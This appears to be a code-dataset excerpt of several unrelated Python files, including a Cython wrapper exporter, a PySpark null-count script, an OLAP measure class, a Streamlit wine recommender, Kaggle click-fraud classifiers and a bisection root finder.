template specializations\n \"\"\"\n def __init__(self, includes=Includes(), config=Config()):\n super(CythonDeclarationExporter, self).__init__()\n self.includes = includes\n self.config = config\n\n def visit_ast(self, ast):\n self.output = render(\"declarations\", typedefs=self.typedefs,\n enums=self.enums, functions=self.functions,\n classes=self.classes)\n\n def visit_enum(self, enum):\n self.enums.append(render(\"enum_decl\", enum=enum))\n\n def visit_typedef(self, typedef):\n self.typedefs.append(templates.typedef_decl % typedef.__dict__)\n\n def visit_clazz(self, clazz):\n self._visit_class(clazz)\n\n def visit_template_class(self, template_class):\n name = \"%s[%s]\" % (template_class.name,\n \", \".join(template_class.template_types))\n self._visit_class(template_class, {\"name\": name})\n\n def _visit_class(self, clazz, additional_args=None):\n if not clazz.ignored:\n class_decl = {}\n class_decl.update(clazz.__dict__)\n if additional_args is not None:\n class_decl.update(additional_args)\n class_decl[\"fields\"] = self.fields\n class_decl[\"ctors\"] = self.ctors\n class_decl[\"methods\"] = self.methods\n class_decl[\"empty_body\"] = (len(self.fields) + len(self.methods) +\n len(self.ctors) == 0)\n\n self.classes.append(render(\"class_decl\", **class_decl))\n self._clear_class()\n\n def visit_field(self, field):\n if not field.ignored:\n self.fields.append(templates.field_decl % field.__dict__)\n\n def visit_constructor(self, ctor):\n if not ctor.ignored:\n const_dict = {\"args\": \", \".join(self.arguments)}\n const_dict.update(ctor.__dict__)\n const_str = templates.constructor_decl % const_dict\n self.ctors.append(const_str)\n self.arguments = []\n\n def visit_method(self, method):\n self._visit_method(method, templates.method_decl)\n\n def visit_template_method(self, template_method):\n self._visit_method(\n template_method, templates.template_method_decl,\n {\"types\": \", \".join(template_method.template_types)})\n\n def _visit_method(self, method, template, additional_args=None):\n if not method.ignored:\n method_dict = {\"args\": \", \".join(self.arguments)}\n method_dict.update(method.__dict__)\n if additional_args is not None:\n method_dict.update(additional_args)\n method_dict[\"name\"] = replace_operator_decl(\n method_dict[\"name\"], self.config)\n method_str = template % method_dict\n method_str += self._exception_suffix(method.result_type)\n self.methods.append(method_str)\n self.arguments = []\n\n def visit_function(self, function):\n if not function.ignored:\n function_dict = {\"args\": \", \".join(self.arguments)}\n function_dict.update(function.__dict__)\n function_str = templates.function_decl % function_dict\n function_str += self._exception_suffix(function.result_type)\n self.functions.append(function_str)\n self.arguments = []\n\n def visit_template_function(self, template_function):\n if not template_function.ignored:\n function_dict = {\n \"args\": \", \".join(self.arguments),\n \"types\": \", \".join(template_function.template_types)}\n function_dict.update(template_function.__dict__)\n function_str = templates.template_function_decl % function_dict\n function_str += self._exception_suffix(\n template_function.result_type)\n self.functions.append(function_str)\n self.arguments = []\n\n def visit_param(self, param):\n param_dict = param.__dict__\n param_dict[\"name\"] = replace_keyword_argnames(param.name)\n self.arguments.append(templates.arg_decl % param_dict)\n\n def _exception_suffix(self, result_type):\n \"\"\"Workaround for bug in Cython when 
returning C arrays.\"\"\"\n if result_type == \"char *\":\n return \"\"\n else:\n return \" except +\"\n\n\ndef replace_operator_decl(method_name, config):\n if method_name in config.call_operators:\n return \"%s \\\"%s\\\"\" % (config.call_operators[method_name], method_name)\n else:\n return method_name\n\n\nclass CythonImplementationExporter(AstExporter):\n \"\"\"Export to Cython implementation file (.pyx).\n\n Parameters\n ----------\n includes : Includes, optional\n Collects information about required import statements from the exporter\n\n type_info : TypeInfo, optional\n Contains names of custom C++ types that have been defined in the code\n\n config : Config, optional\n Configuration that controls e.g. template specializations\n \"\"\"\n def __init__(self, includes=Includes(), type_info=TypeInfo(),\n config=Config()):\n super(CythonImplementationExporter, self).__init__()\n self.includes = includes\n self.type_info = type_info\n self.config = config\n\n def visit_ast(self, ast):\n self.output = render(\"definitions\", enums=self.enums,\n functions=self.functions, classes=self.classes)\n\n def visit_enum(self, enum):\n self.enums.append(render(\"enum\", enum=enum))\n\n def visit_typedef(self, typedef):\n pass\n\n def visit_clazz(self, clazz, cppname=None):\n if self.config.is_ignored_class(clazz.filename, clazz.name):\n warnings.warn(\"Class '%s' from file '%s' is on the blacklist and \"\n \"will be ignored.\" % (clazz.name, clazz.filename))\n clazz.ignored = True\n self._clear_class()\n return\n\n if len(self.ctors) > 1:\n msg = (\"Class '%s' has more than one constructor. This is not \"\n \"compatible to Python. The last constructor will overwrite \"\n \"all others.\" % clazz.name)\n warnings.warn(msg)\n elif len(self.ctors) == 0:\n self.ctors.append(Constructor(clazz.name, \"\"))\n if cppname is None:\n cppname = clazz.name\n\n try:\n self.type_info.attach_specialization(clazz.get_attached_typeinfo())\n class_def = {}\n class_def.update(clazz.__dict__)\n class_def[\"cppname\"] = cppname\n class_def[\"comment\"] = clazz.comment\n class_def[\"fields\"] = map(partial(\n self._process_field, selftype=clazz.name), self.fields)\n class_def[\"ctors\"] = map(partial(\n self._process_constructor, selftype=clazz.name,\n cpptype=clazz.get_cppname()), self.ctors)\n class_def[\"methods\"] = map(partial(\n self._process_method, selftype=clazz.name), self.methods)\n finally:\n self.type_info.remove_specialization()\n\n self.classes.append(render(\"class\", **class_def))\n self._clear_class()\n\n def visit_template_class(self, template_class):\n specializer = ClassSpecializer(self.config)\n for clazz in specializer.specialize(template_class):\n self.visit_clazz(clazz, cppname=clazz.get_cppname())\n\n def visit_field(self, field):\n self.fields.append(field)\n\n def _process_field(self, field, selftype):\n try:\n setter_def = SetterDefinition(\n selftype, field, self.includes, self.type_info,\n self.config).make()\n getter_def = GetterDefinition(\n selftype, field, self.includes, self.type_info,\n self.config).make()\n return {\n \"name\": from_camel_case(field.name),\n \"getter\": getter_def,\n \"setter\": setter_def\n }\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring field '%s'\" % field.name)\n field.ignored = True\n return {}\n\n def visit_constructor(self, ctor):\n self.ctors.append(ctor)\n\n def _process_constructor(self, ctor, selftype, cpptype):\n if self.config.is_abstract_class(ctor.class_name):\n warnings.warn(\"Class '%s' is abstract and will have no 
constructor.\"\n % ctor.class_name)\n ctor.ignored = True\n return \"\"\n\n try:\n constructor_def = ConstructorDefinition(\n selftype, ctor.comment, ctor.nodes, self.includes,\n self.type_info, self.config, cpptype)\n return constructor_def.make()\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring method '%s'\" % ctor.name)\n ctor.ignored = True\n return \"\"\n\n def visit_method(self, method, cppname=None):\n if self.config.is_ignored_method(method.class_name, method.name):\n warnings.warn(\"Method '%s::%s' is on the blacklist and will be \"\n \"ignored.\" % (method.class_name, method.name))\n method.ignored = True\n return\n\n self.methods.append((method, cppname))\n\n def _process_method(self, arg, selftype):\n method, cppname = arg\n try:\n method_def = MethodDefinition(\n selftype, method.comment, method.name, method.nodes,\n self.includes, method.result_type, self.type_info, self.config,\n cppname=cppname)\n return method_def.make()\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring method '%s'\" % method.name)\n method.ignored = True\n return \"\"\n\n def visit_template_method(self, template_method):\n specializer = MethodSpecializer(self.config)\n for method in specializer.specialize(template_method):\n self.visit_method(method, cppname=template_method.name)\n\n def visit_function(self, function, cppname=None):\n try:\n self.functions.append(FunctionDefinition(\n function.name, function.comment, function.nodes, self.includes,\n function.result_type, self.type_info,\n self.config, cppname=cppname).make())\n except NotImplementedError as e:\n warnings.warn(e.message + \" Ignoring function '%s'\" % function.name)\n function.ignored = True\n\n def visit_template_function(self, template_function):\n specializer = FunctionSpecializer(self.config)\n for method in specializer.specialize(template_function):\n self.visit_function(method, cppname=template_function.name)\n\n def visit_param(self, param):\n pass\n\n\nclass FunctionDefinition(object):\n def __init__(self, name, comment, arguments, includes, result_type,\n type_info, config, cppname=None):\n self.name = name\n self.comment = comment\n self.arguments = arguments\n self.includes = includes\n self.initial_args = []\n self.result_type = result_type\n self.type_info = type_info\n self.config = config\n if cppname is None:\n self.cppname = self.name\n else:\n self.cppname = cppname\n self.output_is_copy = True\n self._create_type_converters()\n\n def _create_type_converters(self):\n skip = 0\n self.type_converters = []\n for i, arg in enumerate(self.arguments):\n if skip > 0:\n skip -= 1\n continue\n type_converter = create_type_converter(\n arg.tipe, arg.name, self.type_info, self.config,\n (self.arguments, i))\n type_converter.add_includes(self.includes)\n self.type_converters.append(type_converter)\n skip = type_converter.n_cpp_args() - 1\n self.output_type_converter = create_type_converter(\n self.result_type, None, self.type_info, self.config)\n self.output_type_converter.add_includes(self.includes)\n\n def make(self):\n function = self._signature()\n function[\"input_conversions\"] = self._input_type_conversions()\n function[\"call\"] = self._call_cpp_function(self._call_args())\n function[\"return_output\"] = self.output_type_converter.return_output(\n self.output_is_copy)\n function[\"comment\"] = self.comment\n return render(\"function\", **function)\n\n def _signature(self):\n function_name = from_camel_case(\n self.config.cpp_to_py_operator(self.name))\n return 
{\"def_prefix\": self._def_prefix(function_name),\n \"args\": \", \".join(self._cython_signature_args()),\n \"name\": function_name}\n\n def _def_prefix(self, function_name):\n special_method = (function_name.startswith(\"__\") and\n function_name.endswith(\"__\"))\n if special_method:\n return \"def\"\n else:\n return \"cpdef\"\n\n def _cython_signature_args(self):\n return self.initial_args + [tc.python_type_decl()\n for tc in self.type_converters]\n\n def _input_type_conversions(self):\n return [tc.python_to_cpp() for tc in self.type_converters]\n\n def _call_args(self):\n return list(chain.from_iterable(\n tc.cpp_call_args() for tc in self.type_converters))\n\n def _call_cpp_function(self, call_args):\n call = templates.fun_call % {\"name\": self.cppname,\n \"call_args\": \", \".join(call_args)}\n return catch_result(self.output_type_converter.cpp_type_decl(), call)\n\n\nclass ConstructorDefinition(FunctionDefinition):\n def __init__(self, class_name, comment, arguments, includes, type_info,\n config, cpp_classname):\n super(ConstructorDefinition, self).__init__(\n \"__init__\", comment, arguments, includes, result_type=None,\n type_info=type_info, config=config)\n self.initial_args = [\"%s self\" % class_name]\n self.cpp_classname = cpp_classname\n\n def _call_cpp_function(self, call_args):\n return templates.ctor_call % {\"class_name\": self.cpp_classname,\n \"call_args\": \", \".join(call_args)}\n\n\nclass MethodDefinition(FunctionDefinition):\n def __init__(self, class_name, comment, name, arguments, includes,\n result_type, type_info, config, cppname=None):\n super(MethodDefinition, self).__init__(\n name, comment, arguments, includes, result_type, type_info, config, cppname)\n self.initial_args = [\"%s self\" % class_name]\n\n def _call_cpp_function(self, call_args):\n call = templates.method_call % {\n \"name\": self.config.call_operators.get(self.cppname, self.cppname),\n \"call_args\": \", \".join(call_args)}\n return catch_result(self.output_type_converter.cpp_type_decl(), call)\n\n\nclass SetterDefinition(MethodDefinition):\n def __init__(self, python_classname, field, includes, type_info, config):\n name = \"__set_%s\" % field.name\n super(SetterDefinition, self).__init__(\n python_classname, \"\", name, [field], includes, \"void\", type_info,\n config)\n self.field_name = field.name\n\n def _call_cpp_function(self, call_args):\n assert len(call_args) == 1\n return templates.setter_call % {\"name\": self.field_name,\n \"call_args\": call_args[0]}\n\n\nclass GetterDefinition(MethodDefinition):\n def __init__(self, python_classname, field, includes, type_info, config):\n name = \"__get_%s\" % field.name\n super(GetterDefinition, self).__init__(\n python_classname, \"\", name, [], includes, field.tipe, type_info,\n config)\n self.output_is_copy = False\n self.field_name = field.name\n\n def _call_cpp_function(self, call_args):\n assert len(call_args) == 0\n call = templates.getter_call % {\"name\": self.field_name}\n return catch_result(self.output_type_converter.cpp_type_decl(), call)\n\n\ndef catch_result(result_type_decl, call):\n if result_type_decl == \"\":\n return call\n else:\n return templates.catch_result % {\"cpp_type_decl\": result_type_decl,\n \"call\": call}\n","repo_name":"AlexanderFabisch/cythonwrapper","sub_path":"pywrap/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":20580,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"6"} +{"seq_id":"70983298747","text":"import argparse\n\nfrom 
pyspark import SQLContext, SparkConf, SparkContext\nfrom pyspark.sql.functions import isnull\n\n'''\n@Requirement:\n\nProcess the JSON files from HDFS and compute the null-value percentage/count for each field.\n\n'''\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description=\"Process Data to new Hive Table\")\n    parser.add_argument(\"-path\", help=\"input file path\")\n    parser.add_argument(\"-output\", help=\"output file path\")\n    args = parser.parse_args()\n\n    conf = SparkConf().setAppName(\"pyspark-json\") #connect to spark\n    sc = SparkContext(conf=conf)\n    sqlContext = SQLContext(sc)\n    input_path=args.path #'hdfs://nameservice1/user/hiddenstrawberry/test.json'\n    df=sqlContext.read.json(input_path) #read json file\n    columns=df.columns #columns list\n    counts=df.count()\n    dct={'count':{},'percent':{}}\n    for each in columns:\n        count = df.filter(isnull(each)).count() #null filter\n        dct['count'][each]=count\n        dct['percent'][each]=float(count)/float(counts)\n    dct['namelist']=list(set([int(i.name) for i in df.collect()]))\n    dct['totalcount']=counts\n\n    #add code here to write dict to local or HDFS\n\n\n","repo_name":"HiddenStrawberry/pyspark-sample","sub_path":"pyspark-json.py","file_name":"pyspark-json.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25003616081","text":"\nimport sqlalchemy\nimport common\nimport copy\nimport pyparsing\nimport operator\nfrom operator import add,sub\nfrom pyparsing import *\n\nfrom agregator import agregator\nimport axis_map\n\nclass measure(object):\n    def __init__(self, name):\n        self.name = name\n        self.object = False\n    def validate(self, cube):\n        for measure in cube.measure_ids:\n            if measure.name==self.name:\n                self.object = measure\n        if not self.object:\n            raise ValueError('This measure does not exist!')\n        return True\n\n    def run(self, metadata):\n        table = common.table_get(metadata, self.object.cube_id.table_id)\n        if self.object.measure_type == 'fact_column':\n            col = common.col_get(sqlalchemy.Table(self.object.table_name,metadata), self.object.value_column)\n            col_agregated = agregator[self.object.agregator](col)\n        else:\n            scalar = Word(alphanums+\"_\"+\" \"+\".\") \n            sql_func = [\"sum\",\"max\",\"min\",\"count\",\"avg\"]\n            arith_operator = [\"-\",\"*\",\"/\",\"+\"]\n            \n            sql_function = oneOf(' '.join(sql_func))\n            leftRdBr = Literal(\"(\").suppress()\n            rightRdBr = Literal(\")\").suppress()\n            operator_arith = oneOf(' '.join(arith_operator))\n            sqlexpression = sql_function.setResultsName('sql_func') + leftRdBr + delimitedList(scalar,\",\",combine=False) + rightRdBr | sql_function + leftRdBr + scalar + ZeroOrMore(operator_arith.setResultsName('arithmetic') + scalar) + rightRdBr \n            res = sqlexpression.parseString(self.object.value_sql)\n            operators = []\n            cols = []\n            function = None\n            for item in res:\n                if str(item) == res.sql_func:\n                    function = str(item)\n                elif str(item) == res.arithmetic or str(item) in [\"+\",\"-\",\"/\",\"*\"]:\n                    operators.append(str(item))\n                else:\n                    cols.append(common.measure_sql_exp_col(metadata,str(item)))\n            operations = {\n                '+':operator.add,\n                '-':operator.sub,\n                '/':operator.div,\n                '%':operator.mod,\n                '*':operator.mul,\n            }\n            operators = [operations[name] for name in operators]\n            ops_cols = zip(operators, cols[1:])\n            col = reduce(lambda expr, op_col: op_col[0](expr, op_col[1]), ops_cols,cols[0]) \n\n            if function:\n                col_agregated = agregator[function](col)\n            else:\n                col_agregated = col\n\n        return [ {\n            'value': [(['measures',self.name], self.name, False)],\n            'query': {\n                'column': [col_agregated]\n            },\n            
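# (editor's hedged reading: axis_map.column_fixed(0) appears to pin this single\n            # aggregated column to axis slot 0; 'delta' and 'format' below only\n            # affect how the value is rendered)\n            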
'axis_mapping': axis_map.column_fixed(0),\n            'delta': 0,\n            'format':self.object.formatstring\n        } ]\n\n    def children(self, level, metadata):\n        raise NotImplementedError('Not yet implemented!')\n\n    def __repr__(self):\n        res= '\\t\\t%s\\n' % (self.name,)\n        return res\n\n# vim: ts=4 sts=4 sw=4 si et\n","repo_name":"factorlibre/openerp-extra-6.1","sub_path":"olap/cube/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"32060475995","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport nltk\n#from nltk.corpus import stopwords\nfrom sentence_transformers import SentenceTransformer, util\nimport streamlit as st\nfrom PIL import Image\n\nSTOP_WORDS = {'m', 'hadn', 'yourself', 'this', 'what', 'from', 'will', 'herself', \n              \"aren't\", 'too', \"that'll\", \"didn't\", 'did', 'how', 'ain', \"you'll\", \n              'into', 'off', 'than', 'now', 're', 'shan', \"shan't\", 'where', \"you'd\", \n              \"needn't\", 'being', 'so', 'can', 'of', 'isn', 'or', \"hadn't\", 'then', \n              'he', 'with', 'won', \"wasn't\", 'wouldn', 'before', 'between', 'which', \n              'very', 'under', \"won't\", 'hers', \"you're\", 'it', 'over', 've', 'him', \n              'yourselves', 'was', 'himself', \"isn't\", 'ours', 'these', 'no',\n              'down', 'they', 'about', 'through', 'other', 'don', 'ourselves', 'my', \n              \"mustn't\", \"weren't\", 'because', 'i', 'who', 'same', 'just', 'wasn', \n              'not', 'to', 'those', \"doesn't\", 'hasn', 'be', 'were', 'further', 'y', \n              'if', 'nor', 'am', \"wouldn't\", 's', 'theirs', 'most', \"should've\", 'her',\n              'only', 'our', 'below', 'haven', 'a', 'when', 'why', 'o', 'more', 'had',\n              'are', 'an', 'again', 'some', 'itself', 'mightn', 'been', 'after', \n              \"don't\", 'didn', 'ma', 'she', 'have', 'against', 'is', 'yours', 'both', \n              'its', 'your', 'doesn', 'his', 'but', 'until', 'do', 'on', 'that', \n              'each', \"it's\", 'themselves', 'such', 'any', 't', 'couldn', 'the', \n              \"she's\", 'does', 'their', 'doing', 'and', 'once', 'whom', 'we', 'all', \n              \"you've\", 'has', 'aren', 'as', 'you', 'few', 'should', 'll', 'shouldn', \n              'there', 'above', 'own', \"hasn't\", 'at', \"haven't\", 'mustn', 'them', \n              'for', 'in', 'needn', 'me', \"couldn't\", 'during', \"mightn't\", 'weren', \n              'myself', 'here', 'by', 'out', \"shouldn't\", 'having', 'd',\n              'up', 'while'}\n\nst.set_page_config(layout=\"wide\")\n\n@st.experimental_memo\ndef get_punkt():\n    nltk.download('punkt')\nget_punkt()\n\n@st.experimental_memo\ndef load_model():\n    return SentenceTransformer('distilbert-base-nli-mean-tokens')\n\ndef process_sentences(sentences):\n    word_tokens = nltk.word_tokenize(sentences)\n    tokenized_sentence = [w for w in word_tokens if not w.lower() in STOP_WORDS]\n    remove_punctuation = [word for word in tokenized_sentence if word.isalnum()]\n    cleaned_text = ''\n    for word in remove_punctuation:\n        cleaned_text = cleaned_text +' ' + word \n    return cleaned_text\n\nhead_image = Image.open('images/AromasImage03.png')\n\n@st.experimental_memo\ndef load_data():\n    main_df = pd.read_csv('data/table_10k')\n    df_des = (pd.read_csv('models/final_description_matrix_fp16').values).astype('float32')\n    df_non_des = pd.read_csv('models/non_description_matrix').values\n    return main_df, df_des, df_non_des\n\n[main_df, df_des, df_non_des] = load_data()\n\nrename_cols = {'country':'Country','variety':'Variety', 'winery':'Winery', \n                'points':'Points', 'price':'Price($)', 
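\n                # (added for clarity: keys are the raw CSV column names; values are\n                # the display headers shown in the Streamlit results table)\n                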
'designation':'Designation',\n                'description':'Description'}\nmain_df.rename(columns=rename_cols, inplace=True)\n\nst.title('Hello!')\nst.image(head_image, width=900)\nwith st.sidebar:\n    st.write('Select the country, points, price and province of the wine \\\n        you are looking for:')\n    country =st.selectbox(\"Select country :\", ['any_country', 'Argentina',\n            'Australia', 'Austria', 'Chile', 'France', 'Italy', \\\n            'Other_country', 'Portugal','Spain', 'US'])\n    points = st.selectbox(\"Select points :\", ['any_points', '79-85', \\\n            '85-90', '90-95', '95-100'])\n    price = st.selectbox(\"Select price :\", ['any_price', '0-10', '10-20',\n            '20-30', '30-60', '>60'])\n    province = st.selectbox(\"Select province :\", ['any_province', \\\n            'Bordeaux', 'California', 'Mendoza Province',\n            'Northeastern Italy', 'Northern Spain', 'Oregon', \\\n            'Other_province', 'Piedmont', 'Sicily & Sardinia', 'Tuscany', \\\n            'Washington'])\n\nuser_selections = [country, points, price, province]\ninput_values = ['any_country', 'any_points', 'any_price', 'any_province'] + user_selections\ninput_dict = {'any_country':0, 'any_points':1, 'any_price':2, 'any_province':3,\n        'Argentina':4, 'Australia':5, 'Austria':6, 'Chile':7, 'France':8, \n        'Italy':9, 'Other_country':10, 'Portugal':11, 'Spain':12, 'US':13, \n        '79-85':14, '85-90':15, '90-95':16, '95-100':17, '0-10':18, '10-20':19,\n        '20-30':20, '30-60':21, '>60':22, 'Bordeaux':23, 'California':24, \n        'Mendoza Province':25,'Northeastern Italy':26, 'Northern Spain':27, \n        'Oregon':28, 'Other_province':29, 'Piedmont':30,\n        'Sicily & Sardinia':31, 'Tuscany':32, 'Washington':33}\n\nuser_selection_input_array = np.zeros(len(input_dict))\nfor item in input_values:\n    index = input_dict[item]\n    user_selection_input_array[index] = 1\n\nuser_text_input = st.text_area('Write a description of the flavours you want \\\n     : (e.g. 
Smokey, oaky, citrus, earthy, black pepper...)', )\nbutton_pressed = st.button('Give me wine recommendations')\ndef user_description_is_empty(user_text_input):\n if len(process_sentences(user_text_input)) > 0:\n return False\n return True\n\ndef user_selections_are_default(user_selections):\n if (user_selections[0]=='any_country' and \\\n user_selections[1]=='any_points' and \\\n user_selections[2]=='any_price' and \\\n user_selections[3]=='any_province'):\n return True\n return False\n\nuseful_features_from_main_df = ['Country','Variety', 'Winery', 'Points', \\\n 'Price($)', 'Designation','Description']\nuseful_features = ['country','variety', 'winery', 'points', 'price', \\\n 'designation','description']\n\nif button_pressed:\n out = np.dot(df_non_des, user_selection_input_array)\n best_ids_from_nondes_matrix = np.argwhere(out == np.max(out)).T[0]\n if user_description_is_empty(user_text_input):\n if not user_selections_are_default(user_selections):\n id = best_ids_from_nondes_matrix[0:6]\n recommendation = main_df.loc[id, useful_features_from_main_df]\n st.write(\"Here are our recommendations:\")\n st.write(recommendation)\n else:\n id = np.random.randint(low=0, high=len(best_ids_from_nondes_matrix), size=6)\n recommendation = main_df.loc[id, useful_features_from_main_df]\n st.write(\"Here are our recommendations:\")\n st.write(recommendation)\n else:\n model = load_model()\n processed_input = model.encode(process_sentences(user_text_input))\n #dotted_vec = np.dot(des_vec, processed_input)\n dotted_vec = util.cos_sim(df_des, processed_input)\n best_ids_from_des_matrix = np.array(dotted_vec).T[0].argsort()[-60:][::-1] #get top matches\n recommendation = pd.DataFrame(columns = useful_features_from_main_df)\n intersection = np.intersect1d(best_ids_from_nondes_matrix, best_ids_from_des_matrix)\n\n if len(intersection) == 0:\n id = best_ids_from_des_matrix[0:3]\n recommendation = main_df.loc[id, useful_features_from_main_df]\n recommendation.reset_index(drop=True, inplace=True)\n st.write('Umm... We do not have any exact matches... 
But \\\n here are some which we think you may like')\n st.write(recommendation)\n else:\n id = intersection[0:5]\n recommendation = main_df.loc[id, useful_features_from_main_df]\n recommendation.reset_index(drop=True, inplace=True)\n st.write(\"Here are our recommendations:\")\n st.write(recommendation)\n\n","repo_name":"AshwinSwar/Wine-Recommender-app","sub_path":"streamlit-app.py","file_name":"streamlit-app.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70150687869","text":"#!/usr/bin/env python3.5\n# coding=utf-8\n\n'''\n@date = '17/12/1'\n@author = 'lynnchan'\n@email = 'ccchen706@126.com'\n'''\n\n\nimport csv_reader\nimport numpy as np\n\nfrom sklearn.svm import SVC\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import LinearSVR\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\nimport random\nfrom sklearn.naive_bayes import MultinomialNB,BernoulliNB\nfrom sklearn.metrics import roc_auc_score,roc_curve\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Binarizer\n\nfrom sklearn.linear_model import Perceptron,SGDClassifier,PassiveAggressiveClassifier\n\nData_reader = csv_reader.CsvReader('../DataSet/TalkingData')\nData_writer = csv_reader.CsvReader('../output')\n\nclfdir={'MNB':MultinomialNB(),\n 'BNB':BernoulliNB(),\n 'PT':Perceptron(),\n 'SG':SGDClassifier(),\n 'PAC':PassiveAggressiveClassifier()}\n\n\n# clfdir={'MNB':MultinomialNB(),\n# 'BNB':BernoulliNB()}\n\n\ndef get_next_data(train_data_chunk,persent=1,number=20000):\n print('get_next_data ')\n res_data = pd.DataFrame()\n test_data = pd.DataFrame()\n for data_chunk in train_data_chunk:\n if test_data.empty:\n test_data = data_chunk\n else:\n if random.randint(0, 10) > 2:\n data_with_label=data_chunk.loc[data_chunk['is_attributed']==1]\n data_without_label = data_chunk.loc[data_chunk['is_attributed'] == 0]\n persent_v=(len(data_with_label)/len(data_without_label))*persent\n if persent_v<1:\n df2 = data_without_label.sample(frac=persent_v)\n else:\n df2 = data_without_label\n if res_data.empty:\n res_data = pd.concat([df2,data_with_label], ignore_index=True)\n else:\n res_data = pd.concat([res_data,df2, data_with_label], ignore_index=True)\n\n if len(res_data) > number:\n X_train = res_data.iloc[:number, 1:5]\n Y_train = res_data.iloc[:number, 7:8]\n\n X_test=test_data.iloc[:number, 1:5]\n Y_test=test_data.iloc[:number, 7:8]\n\n yield X_train, Y_train,X_test,Y_test\n else:\n pass\n\ndef get_next_data_without_persent(train_data_chunk,number=2000):\n for data_chunk in train_data_chunk:\n X_train = data_chunk.iloc[:number, 1:5]\n Y_train = data_chunk.iloc[:number, 7:8]\n yield X_train,Y_train\n\ndef get_next_test_data(test_data_chunk):\n for data_chunk in test_data_chunk:\n id = data_chunk.iloc[:, :1]\n X_test = data_chunk.iloc[:, 2:6]\n yield id,X_test\n\n\nif __name__ == '__main__':\n\n train_data_chunk = Data_reader.read_data_chunk('train.csv',40000)\n get_next_data_chunk = get_next_data(train_data_chunk)\n for kv in clfdir.items():\n predict =kv[1]\n key=kv[0]\n print('use',key)\n all_classes = np.array([0, 1])\n\n socer = []\n\n for i, (X_train_text, y_train,X_test,Y_test) in enumerate(get_next_data_chunk):\n # train_data, vali_data, train_labels, vali_labels = \\\n # train_test_split(X_train_text, y_train, train_size=0.90, random_state=1)\n 
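# (note: partial_fit trains these linear models incrementally, one chunk at a\n            # time, so the full training CSV never has to fit in memory)\n            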
predict.partial_fit(X_train_text, y_train, classes=all_classes)\n # vali_data = get_next_data_without_persent(train_data_chunk)\n # pre_res_data = (np.array(predict.predict(X_test)))[:,1]\n pre_res_data = (np.array(predict.predict(X_test)))\n # print('shape',pre_res_data.shape)\n idx = 0\n idx_diff = 0\n # for inum,v in enumerate(pre_res_data):\n # print(v)\n # if v!=Y_test.values.flatten()[inum]:\n # idx_diff+=1\n # if v == 1:\n # idx+=1\n socer_roc=metrics.roc_auc_score(Y_test.values,pre_res_data)\n\n print('test data res::',socer_roc)\n\n socer.append(socer_roc)\n\n if i > 10:\n if (socer[-1]+socer[-2]+socer[-3]) <= (socer[-4]+socer[-5]+socer[-6]):\n print('train over :',socer[-1])\n break\n\n # print('use:',key,'value:',socer[-1],socer[-2],socer[-3],(socer[-1]+socer[-2]+socer[-3])/3)\n\n end_p = (socer[-1]+socer[-2]+socer[-3])/3\n\n print('end_p',end_p)\n\n if end_p >= 0.972:\n\n test_data_chunk = Data_reader.read_data_chunk('test.csv', 20000)\n get_next_test_data_chunk = get_next_test_data(test_data_chunk)\n\n for i, (id, X_test_text) in enumerate(get_next_test_data_chunk):\n res_data = np.array(predict.predict(X_test_text))\n print(id.values.flatten()[0],end=' | ')\n if i%20 == 1:\n print('')\n Data_writer.write_data_with_index(res_data, id.values.flatten(),\n 'TalkinSubmission'+key+str(end_p).replace('.','_')[:5]+'.csv',\n columns=('is_attributed',),index_name='click_id')\n\n\n\n","repo_name":"LynnChan706/learn_kaggle","sub_path":"TalkinDecisionTree.py","file_name":"TalkinDecisionTree.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17276717438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Source: https://stackoverflow.com/questions/13054758/python-finding-multiple-roots-of-nonlinear-equation\n\nimport math\n\ndef rootsearch(f,a,b,dx):\n x1 = a; f1 = f(a)\n x2 = a + dx; f2 = f(x2)\n while f1*f2 > 0.0:\n if x1 >= b:\n return None,None\n x1 = x2; f1 = f2\n x2 = x1 + dx; f2 = f(x2)\n return x1,x2\n\ndef bisect(f,x1,x2,switch=0,epsilon=1.0e-9):\n f1 = f(x1)\n if f1 == 0.0:\n return x1\n f2 = f(x2)\n if f2 == 0.0:\n return x2\n if f1*f2 > 0.0:\n print('Root is not bracketed')\n return None\n n = int(math.ceil(math.log(abs(x2 - x1)/epsilon)/math.log(2.0)))\n for i in range(n):\n x3 = 0.5*(x1 + x2); f3 = f(x3)\n if (switch == 1) and (abs(f3) >abs(f1)) and (abs(f3) > abs(f2)):\n return None\n if f3 == 0.0:\n return x3\n if f2*f3 < 0.0:\n x1 = x3\n f1 = f3\n else:\n x2 =x3\n f2 = f3\n return (x1 + x2)/2.0\n\ndef roots(f, a, b, eps=1e-6):\n # print ('The roots on the interval [%f, %f] are:' % (a,b))\n lst_roots = []\n while 1:\n x1,x2 = rootsearch(f,a,b,eps)\n if x1 != None:\n a = x2\n root = bisect(f,x1,x2,1)\n if root != None:\n pass\n lst_roots.append(root)\n # print (round(root,-int(math.log(eps, 10))))\n else:\n # print ('\\nDone')\n break\n return lst_roots\n","repo_name":"songningqiang/FANFIC","sub_path":"src/extract_pdf_contours/root_solver.py","file_name":"root_solver.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9272087127","text":"import os\n\n# Define a base 